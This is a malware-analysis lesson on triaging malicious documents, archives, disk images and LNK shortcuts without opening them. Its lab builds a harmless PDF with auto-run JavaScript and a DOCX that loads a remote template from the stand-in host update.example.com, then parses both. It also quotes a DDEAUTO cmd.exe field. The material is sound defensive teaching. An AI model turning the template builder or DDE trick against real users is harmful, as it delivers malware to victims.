Skip to content

Lesson 10.4 · Beyond the EXE· 45 min

Malicious Documents and Archives

Triage malicious Office files, RTF, PDF, archives, disk images and LNK shortcuts without opening them, and pull out the next stage and its IOCs.

Objectives

  • Identify the real format of an attachment from its magic bytes, whatever its extension says
  • Locate active content in Office files: VBA and XLM macros, auto-run entry points, remote templates, embedded OLE objects and DDE fields
  • Read a PDF's object structure and find /OpenAction, /JavaScript, /Launch, /URI and /EmbeddedFile entries with pdfid and a PDF parser
  • Explain how ISO, VHD, archives and LNK files are used to deliver payloads and how containers affected Mark-of-the-Web
  • Extract next-stage URLs, dropped file names and embedded-object hashes, and turn them into a report and a YARA rule

Most malware does not reach a victim as a bare EXE. It arrives as an invoice or a shipping notice: a Word document, a PDF, a ZIP, a disk image or a shortcut. The file is rarely the payload. It is a delivery vehicle whose only job is to get something else running: a macro that launches PowerShell, a link that fetches a template, an embedded executable, or an exploit that drops shellcode.

That shapes the analyst's goal. Faced with a suspicious attachment, you want to answer three questions: what format is this really, where is the active content, and what is the next stage (a URL, an embedded file, a command line)? And you want to answer them without opening the file in Word, Acrobat or Explorer, because opening it is exactly what the attacker designed for. Every technique in this lesson parses the container as data.

Identify the real format first

Extensions lie, and applications are lenient. Word will happily open an RTF renamed to .doc, and Windows decides how to handle a file from its extension, not its content. Start with the first bytes, as in Identifying and Hashing Files.

FormatMagic bytesWhereNotes
OLE2 compound file (.doc, .xls, .ppt, .msg)D0 CF 11 E0 A1 B1 1A E1Offset 0A small file system of storages and streams inside one file
OOXML (.docx, .docm, .xlsx, .xlsm, .pptx)50 4B 03 04 (PK..)Offset 0A ZIP of XML parts; also JAR, APK and plain ZIP
RTF{\rtfOffset 0Plain text; Word tolerates damaged headers such as {\rt
PDF%PDF-Near the startReaders accept the header anywhere in the first 1024 bytes
ISO 9660 (.iso, often .img)CD001Offset 0x8001The first 32 KiB are a reserved system area, usually zeros
VHD / VHDXconectix / vhdxfileFooter (VHD) / offset 0 (VHDX)Mounted by Windows with a double-click
Windows shortcut (.lnk)4C 00 00 00 01 14 02 00Offset 0Header size 0x4C followed by the shell link CLSID
OneNote (.one)E4 52 5C 7B 8C D8 A7 4DOffset 0Start of the section file's GUID; embedded files are stored in the clear

file and Detect It Easy recognise all of these. A mismatch with the extension is itself a finding.

HTML smuggling does not fit in the table because there is no special format: the attachment is an ordinary .html file. Its script holds a payload as a Base64 string or a byte array, turns it into a Blob and triggers a download with URL.createObjectURL and an <a download> element, so the ZIP or ISO is assembled inside the browser and never crosses the mail gateway as a file. Treat it as script malware: find the blob, decode it statically, and triage what it contains.

Office documents

Where macros live

VBA code is stored in an OLE2 structure in both generations of Office format: the Macros/VBA storage in a legacy .doc, _VBA_PROJECT_CUR/VBA in an .xls. A macro-enabled OOXML file (.docm, .xlsm) carries a complete OLE file as the ZIP member word/vbaProject.bin or xl/vbaProject.bin, so unzip -l alone tells you whether a macro project exists.

Each module stream holds two things: the source code, compressed with the MS-OVBA algorithm, and p-code, the compiled form for a specific VBA version. Office runs the p-code when the version matches and recompiles from source when it does not.

That split enables VBA stomping: the attacker overwrites or blanks the source while keeping the malicious p-code. olevba then shows harmless or empty source, yet Office on a matching version executes the p-code. olevba flags a likely stomp when the source and p-code disagree, and pcodedmp disassembles the p-code directly.

Entry points that run automatically

A macro is harmless until something calls it. Look first for procedures Office runs on its own:

HostAuto-run names
WordAutoOpen, Document_Open, AutoClose, Document_Close, AutoExec, AutoNew, Document_New
ExcelAuto_Open, Workbook_Open, Workbook_Activate, Auto_Close, Workbook_BeforeClose
AnyActiveX control events such as InkPicture1_Painted or *_Layout, used to avoid the obvious names

From the entry point, follow the calls to the sinks that act on the system: Shell, CreateObject("WScript.Shell"), WScript.Shell.Run, MSXML2.XMLHTTP, ADODB.Stream SaveToFile, WMI's Win32_Process.Create, and Declare statements that import Windows APIs such as VirtualAlloc and CreateThread for in-process shellcode. Deobfuscate as for scripts: decode strings statically and keep each layer.

Excel 4.0 (XLM) macros

Before VBA, Excel had macro sheets: formulas like =EXEC(), =CALL() and =REGISTER() in cells, run from a defined name Auto_Open. Attackers revived them around 2020 because many tools and scanners ignored them. Macro sheets are often very hidden (a state only settable programmatically), and formulas build strings with CHAR() and cell references across the sheet. olevba reports XLM via its BIFF plugin, and XLMMacroDeobfuscator emulates the formulas to recover the final calls. Microsoft now disables XLM macros by default.

Remote templates and external relationships

An OOXML document does not need a macro to fetch one. Every part's relationships live in a _rels/*.rels file, and a relationship with TargetMode="External" points outside the package. When word/_rels/settings.xml.rels holds an attachedTemplate relationship to a URL, Word downloads that template when the document opens, and the template can carry the macros. This is remote template injection (ATT&CK T1221): the attachment itself is clean, and the payload lives on a server that can be switched on for a few hours only. The same mechanism with an oleObject relationship pointing to an HTML page was the delivery path for Follina (CVE-2022-30190). Any external target in a .rels part is a next-stage URL.

Embedded OLE objects and DDE

Documents can embed other files as OLE objects: a Package object wrapping an EXE, script or LNK with an icon the user is invited to double-click, or an object of a specific class that a vulnerable component will parse. Resources, Overlays and Other Hiding Places made the same point about PEs: containers inside containers.

DDE (Dynamic Data Exchange) fields were abused in 2017 as a macro-free way to run commands: a field such as DDEAUTO c:\\windows\\system32\\cmd.exe "/k ..." in the document body asks Office to start a program when fields update. Microsoft has since disabled automatic DDE updates by default, but old samples and CSV variants still appear.

The oletools workflow

Described here rather than run on a live sample:

  1. oleid sample.doc: a risk summary of format, encryption, VBA, XLM and external relationships.
  2. olevba --decode sample.doc > olevba.txt: decompressed VBA source plus a keyword table (AutoExec, Suspicious, IOC). Read the table, then the code from the auto-run procedure onwards.
  3. oledump.py sample.doc lists every stream with an index, flagging VBA streams with M; oledump.py -s 8 -v sample.doc decompresses one module when olevba's output is partial.
  4. If olevba reports stomping, compare pcodedmp's p-code disassembly with the visible source.
  5. oleobj -d out/ sample.doc extracts embedded objects (and lists external relationships in OOXML); msodde sample.doc prints DDE fields. Hash each extracted object and triage it as a new sample.

Warning: Encrypted Office files hide everything from these tools. oleid reports Encrypted: True, and olevba tries the default read-only password VelvetSweatshop automatically. For other passwords, which phishing emails often supply in the body, decrypt a copy with msoffcrypto-tool before analysis.

RTF: objects and the Equation Editor

RTF is text, so it cannot hold VBA, but its \object and \objdata control words embed OLE objects as hex. The parser is extremely forgiving: unknown control words are skipped, whitespace and junk are allowed inside hex data, and headers can be mangled. Attackers use that tolerance to break signatures, which is why you should use rtfobj instead of a regular expression. It lists each object with its class name and extracts the raw data.

The class name that mattered most was Equation.3. The Microsoft Equation Editor, EQNEDT32.EXE, was a component from 2000 that ran as its own process without modern mitigations such as ASLR. CVE-2017-11882 was a stack buffer overflow in its font-name parsing, and CVE-2018-0802 a second overflow found soon after. An RTF with an Equation.3 object was enough to run shellcode with no macro prompt at all, on any unpatched Office version, and these exploits stayed in commodity campaigns for years after Microsoft removed the component in January 2018. When rtfobj shows an equation object, extract it, locate the shellcode, and continue with Shellcode Analysis.

PDF structure

A PDF is a set of numbered objects (7 0 obj ... endobj) that reference each other (7 0 R), an xref table giving each object's offset, and a trailer naming the root catalog. Objects are dictionaries, arrays, strings, names and numbers; large data sits in streams, whose dictionary names the filters applied to them (/FlateDecode is zlib; /ASCIIHexDecode, /ASCII85Decode, /LZWDecode and /RunLengthDecode are also common, and filters can be chained). Compressed streams are why grep finds nothing interesting in most malicious PDFs.

The names that matter:

NameMeaning
/OpenAction, /AAAn action to run when the document or a page opens (additional actions)
/JavaScript, /JSJavaScript action and its code, inline or in a stream
/LaunchStart an external program or open a file
/EmbeddedFileA file attached inside the PDF
/URI, /SubmitForm, /GoToROpen a URL, send form data, open another document
/ObjStmObject stream: objects stored compressed inside another stream
/Encrypt, /XFA, /RichMedia, /JBIG2DecodeEncryption, XML forms, Flash, and a filter tied to past exploits

Two evasion tricks recur: hex-escaped names (/J#61vaScript is /JavaScript) and objects hidden inside an /ObjStm, invisible to a scanner that reads only the top level. pdfid normalises escaped names and counts /ObjStm; a non-zero count means you need a parser that expands object streams.

Most malicious PDFs today are phishing lures with a /URI link or a QR code, so the URL is often the whole finding. With Didier Stevens' tools: pdfid for keyword counts, then pdf-parser.py -s /OpenAction to search for a name, pdf-parser.py -o 7 -f to show object 7 with its filters applied, and -d out.bin to dump the decoded stream. peepdf-3 offers the same through commands such as object, stream and extract uri.

Containers, archives and Mark-of-the-Web

When Windows saves a file from the internet, the browser or mail client adds an NTFS alternate data stream named Zone.Identifier with ZoneId=3. That Mark-of-the-Web (MotW) is what makes SmartScreen warn about executables, Office open documents in Protected View and, since 2022, block macros in internet documents outright.

Attackers responded by wrapping payloads in containers that did not pass the mark to their contents:

  • ISO, IMG and VHD files mount as a drive with a double-click. Until the November 2022 Windows update, files inside a mounted ISO did not inherit MotW, so an LNK or EXE inside ran without the warning a direct download would have triggered.
  • Password-protected ZIP and 7z archives defeat gateway scanning because the contents are encrypted, and the password sits in the email body. Some third-party extractors do not propagate MotW, or only when configured to.
  • Nested archives (a ZIP in an ISO in a ZIP) exhaust scanners' recursion limits and multiply the chances that one layer drops the mark.

Once Microsoft blocked internet macros in 2022, ISO plus LNK, then OneNote files with embedded scripts, became the commodity delivery of choice. For analysis, extract with 7-Zip, which reads ISO, VHD and most archives without mounting anything, triage each file inside, and record the full nesting.

LNK files as launchers

A shortcut needs no exploit. It points to a legitimate binary such as cmd.exe, powershell.exe, mshta.exe or rundll32.exe, with arguments that do the work and an icon borrowed from a PDF reader or a folder. The arguments are often padded with whitespace so the Properties dialog shows only an innocent start.

The fields to extract, with LnkParse3 (lnkparse sample.lnk, or -j for JSON):

  1. Target: the path in the LinkTargetIDList and LinkInfo structures.
  2. Command-line arguments from StringData: usually the payload, often an encoded PowerShell command to decode as in the script lesson.
  3. Icon location and working directory: what the lure imitates and where it expects companion files.
  4. Tracker data block in ExtraData: the NetBIOS name and a MAC address of the machine that created the shortcut. They describe the attacker's build machine and cluster campaigns well.
  5. Data appended after the LNK structures, which some samples carve out with findstr or PowerShell.

What to extract and report

For every document or container, collect:

  • Format chain: each layer from outer container to payload, with its real type and SHA-256.
  • Active content: macro entry points, XLM cells, JavaScript, DDE fields, exploit object classes, LNK target and arguments.
  • Next-stage URLs from macros, .rels targets, PDF actions and LNK arguments, defanged (hxxp://update[.]example[.]com/lab).
  • Dropped file names such as %TEMP%\invoice.dll, and the command that runs them.
  • Hashes of embedded objects: the same OLE object or template often recurs across lures with different text.
  • Macro IOCs: decoding keys, API declarations, user agents, author metadata, LNK machine IDs.

Then write it up with the triage report structure.

For detection, remember what YARA sees. OLE and PDF structure is visible in the raw file, so uint32(0) == 0x46445025 (%PDF) with names like /OpenAction and /JavaScript works. But OOXML parts are deflated inside the ZIP and VBA source is compressed in its stream, so strings you read in olevba's output are usually not in the file's bytes. Match those against extracted parts, as the lab shows, and unpack before scanning.

Lab: a PDF and a DOCX, analysed without a viewer

You will build two harmless files with Python and find their active content with parsers only. The PDF's JavaScript only calls app.alert("lab"); the DOCX has no macro at all; both point to the reserved domain example.com. Outputs are real, from Python 3.14.7 on macOS with oletools 0.60.2, pdfid 0.2.7, peepdf-3 6.0.0 and yara-python in a virtual environment. pdf-parser is not on PyPI, so peepdf-3 plays its role.

  1. Create an isolated environment:

    bash
    python3 -m venv venv
    ./venv/bin/pip install oletools pdfid peepdf-3 yara-python
  2. Save make_pdf.py. It writes seven objects: a catalog whose /OpenAction points to a JavaScript action, a page with a link annotation, and a /FlateDecode stream holding the script:

    python
    # make_pdf.py: build a harmless lab PDF with an /OpenAction JavaScript and a /URI link
    import zlib
    
    js = zlib.compress(b'app.alert("lab");')
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R /Annots [6 0 R] >>",
        b"<< /Length 0 >>\nstream\n\nendstream",
        b"<< /Type /Action /S /JavaScript /JS 7 0 R >>",
        b"<< /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (http://update.example.com/lab) >> >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(js) + js + b"\nendstream",
    ]
    out = bytearray(b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n")
    offsets = []
    for n, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n" % n + body + b"\nendobj\n"
    xref = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref)
    open("statement.pdf", "wb").write(out)
    print(f"wrote statement.pdf, {len(out)} bytes")
  3. Build it and check what plain text search can see:

    bash
    ./venv/bin/python make_pdf.py
    grep -ac 'app.alert' statement.pdf
    grep -ao '/URI ([^)]*)' statement.pdf
    text
    wrote statement.pdf, 793 bytes
    0
    /URI (http://update.example.com/lab)

    The URL is an uncompressed string and shows up. The script is inside a deflated stream and does not.

  4. Run pdfid (the pip package installs it as a module) and hide the zero counts:

    bash
    ./venv/bin/python -m pdfid statement.pdf | grep -vE ' 0$'
    text
    PDFiD 0.2.7 statement.pdf
     PDF Header: %PDF-1.7
     obj                    7
     endobj                 7
     stream                 2
     endstream              2
     xref                   1
     trailer                1
     startxref              1
     /Page                  1
     /JS                    1
     /JavaScript            1
     /OpenAction            1

    /OpenAction with /JavaScript is the classic pair: code that runs when the file opens. pdfid does not count /URI by default, one reason to follow up with a parser.

  5. Get peepdf-3's summary (-g disables colours, -f forces parsing past errors). Trimmed to the analysis section:

    bash
    ./venv/bin/peepdf -g -f statement.pdf
    text
    Objects: 7
    Streams: 2
    URIs: 1
    ...
    	Streams (2): [4, 7]
    	Encoded (1): [7]
    	Objects with URIs (1): [6]
    	Objects with JS code (1): [7]
    	Suspicious elements (3):
    		/OpenAction (1): [1]
    		/JS (1): [5]
    		/JavaScript (1): [5]
  6. Follow the chain from the catalog to the code, one object at a time:

    bash
    for c in "object 1" "object 5" "filters 7" "stream 7" "extract uri"; do
      ./venv/bin/peepdf -g -f -C "$c" statement.pdf
    done
    text
    << /Type /Catalog
    /Pages 2 0 R
    /OpenAction 5 0 R >>
    
    << /Type /Action
    /S /JavaScript
    /JS 7 0 R >>
    
    /FlateDecode
    
    app.alert("lab");
    
    http://update.example.com/lab 6

    Object 1 opens with object 5, a JavaScript action whose code is object 7, deflated. peepdf decoded it without any reader running it. With pdf-parser: -s /OpenAction, then -o 5, then -o 7 -f.

  7. Save make_docx.py, which writes a six-part OOXML package whose settings relationship points to a remote template:

    python
    # make_docx.py: build a harmless .docx whose settings point to a remote template
    import zipfile
    
    W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
    PR = "http://schemas.openxmlformats.org/package/2006/relationships"
    
    parts = {
        "[Content_Types].xml": """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
    <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
    <Default Extension="xml" ContentType="application/xml"/>
    <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
    <Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/>
    </Types>""",
        "_rels/.rels": f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="{PR}">
    <Relationship Id="rId1" Type="{R}/officeDocument" Target="word/document.xml"/>
    </Relationships>""",
        "word/document.xml": f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <w:document xmlns:w="{W}"><w:body><w:p><w:r><w:t>Invoice attached. Please enable editing.</w:t></w:r></w:p></w:body></w:document>""",
        "word/_rels/document.xml.rels": f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="{PR}">
    <Relationship Id="rId1" Type="{R}/settings" Target="settings.xml"/>
    </Relationships>""",
        "word/settings.xml": f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <w:settings xmlns:w="{W}" xmlns:r="{R}"><w:attachedTemplate r:id="rId1"/></w:settings>""",
        "word/_rels/settings.xml.rels": f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="{PR}">
    <Relationship Id="rId1" Type="{R}/attachedTemplate" Target="http://update.example.com/lab/template.dotm" TargetMode="External"/>
    </Relationships>""",
    }
    
    with zipfile.ZipFile("invoice.docx", "w", zipfile.ZIP_DEFLATED) as z:
        for name, text in parts.items():
            z.writestr(zipfile.ZipInfo(name, date_time=(2026, 9, 29, 9, 0, 0)), text, zipfile.ZIP_DEFLATED)
    print("wrote invoice.docx")
  8. Build it, confirm the format and list the parts:

    bash
    ./venv/bin/python make_docx.py
    xxd -l 16 invoice.docx
    file invoice.docx
    unzip -l invoice.docx
    grep -ac update.example invoice.docx
    text
    wrote invoice.docx
    00000000: 504b 0304 1400 0000 0800 0048 3d5d d765  PK.........H=].e
    invoice.docx: Microsoft Word 2007+
    Archive:  invoice.docx
      Length      Date    Time    Name
    ---------  ---------- -----   ----
          566  09-29-2026 09:00   [Content_Types].xml
          300  09-29-2026 09:00   _rels/.rels
          242  09-29-2026 09:00   word/document.xml
          289  09-29-2026 09:00   word/_rels/document.xml.rels
          263  09-29-2026 09:00   word/settings.xml
          350  09-29-2026 09:00   word/_rels/settings.xml.rels
    ---------                     -------
         2010                     6 files
    0

    PK and a word/ tree: OOXML, with no vbaProject.bin. A raw grep for the domain finds nothing because every part is deflated.

  9. Read the relationship parts straight from the archive, without extracting to disk:

    bash
    unzip -p invoice.docx 'word/_rels/*.rels' | grep -o '<Relationship [^>]*TargetMode="External"[^>]*>'
    text
    <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://update.example.com/lab/template.dotm" TargetMode="External"/>
  10. Let oletools reach the same conclusion. Output trimmed of banners:

    bash
    ./venv/bin/oleid invoice.docx
    ./venv/bin/olevba invoice.docx
    ./venv/bin/oleobj invoice.docx
    text
    File format         |MS Word 2007+       |info      |
                        |Document (.docx)    |          |
    Container format    |OpenXML             |info      |Container type
    Encrypted           |False               |none      |The file is not encrypted
    VBA Macros          |No                  |none      |This file does not contain
                        |                    |          |VBA macros.
    XLM Macros          |No                  |none      |This file does not contain
                        |                    |          |Excel 4/XLM macros.
    External            |1                   |HIGH      |External relationships
    Relationships       |                    |          |found: attachedTemplate -
                        |                    |          |use oleobj for details
    
    Type: OpenXML
    No VBA or XLM macros found.
    
    Found relationship 'attachedTemplate' with external link http://update.example.com/lab/template.dotm

    olevba correctly finds no macro; a triage that stopped there would call the file clean. oleid rates the external relationship HIGH and oleobj names the template URL: the next stage.

  11. Write a YARA rule for the relationship and test where it matches. Save remote_template.yar:

    text
    rule OOXML_Remote_Template_Rels
    {
        meta:
            description = "Relationship part that loads an Office template from a URL"
            scope = "extracted OOXML .rels parts"
        strings:
            $type = "/relationships/attachedTemplate" ascii
            $ext  = "TargetMode=\"External\"" ascii
            $url  = /Target="https?:\/\/[^"]{4,200}"/ ascii
        condition:
            filesize < 20KB and all of them
    }

    Then run it against the extracted parts and against the DOCX itself:

    bash
    mkdir -p ext && (cd ext && unzip -oq ../invoice.docx)
    ./venv/bin/python - <<'EOF'
    import yara, pathlib
    r = yara.compile("remote_template.yar")
    for p in sorted(pathlib.Path("ext").rglob("*")):
        if p.is_file():
            m = r.match(str(p))
            if m: print(p, [x.rule for x in m])
    print("docx itself:", r.match("invoice.docx"))
    EOF
    text
    ext/word/_rels/settings.xml.rels ['OOXML_Remote_Template_Rels']
    docx itself: []

    It matches the extracted part and misses the DOCX: compression hides the strings.

Questions to answer: Why did grep find the PDF's URL but not its JavaScript, and why did it find neither string in the DOCX? Which single pdfid line would make you distrust its other counts? If an attacker changed /JavaScript to /J#61vaScript in object 5, which tools in this lab would still report it? Why would a mail gateway that only checks for macros pass invoice.docx, and what would Word do when a user opened it? Write the IOC section of a report for both files, with the URLs defanged and each file's SHA-256.

Key takeaways

  • Documents and archives are delivery vehicles. Find the active content and the next stage by parsing the file as data, never by opening it.
  • Identify the format from magic bytes: OLE2 D0 CF 11 E0, OOXML PK, RTF {\rtf, PDF %PDF-, ISO CD001 at 0x8001, LNK 4C 00 00 00.
  • In Office files, look for vbaProject.bin or VBA storages, auto-run names such as AutoOpen, Document_Open and Workbook_Open, XLM macro sheets, external .rels targets, embedded OLE objects and DDE fields. Stomped VBA hides its source.
  • In PDFs, follow the object references from /OpenAction or /AA to /JavaScript, /Launch, /URI or /EmbeddedFile, decoding streams with a parser rather than a viewer.
  • Containers (ISO, VHD, encrypted and nested archives) and LNK launchers became common because they avoided Mark-of-the-Web and macro blocking. Extract them with 7-Zip, parse LNK arguments and tracker data, and record the full chain.
  • Report the format chain with hashes, the active content, defanged next-stage URLs and dropped files, and write YARA rules against decompressed content when the container compresses what you want to match.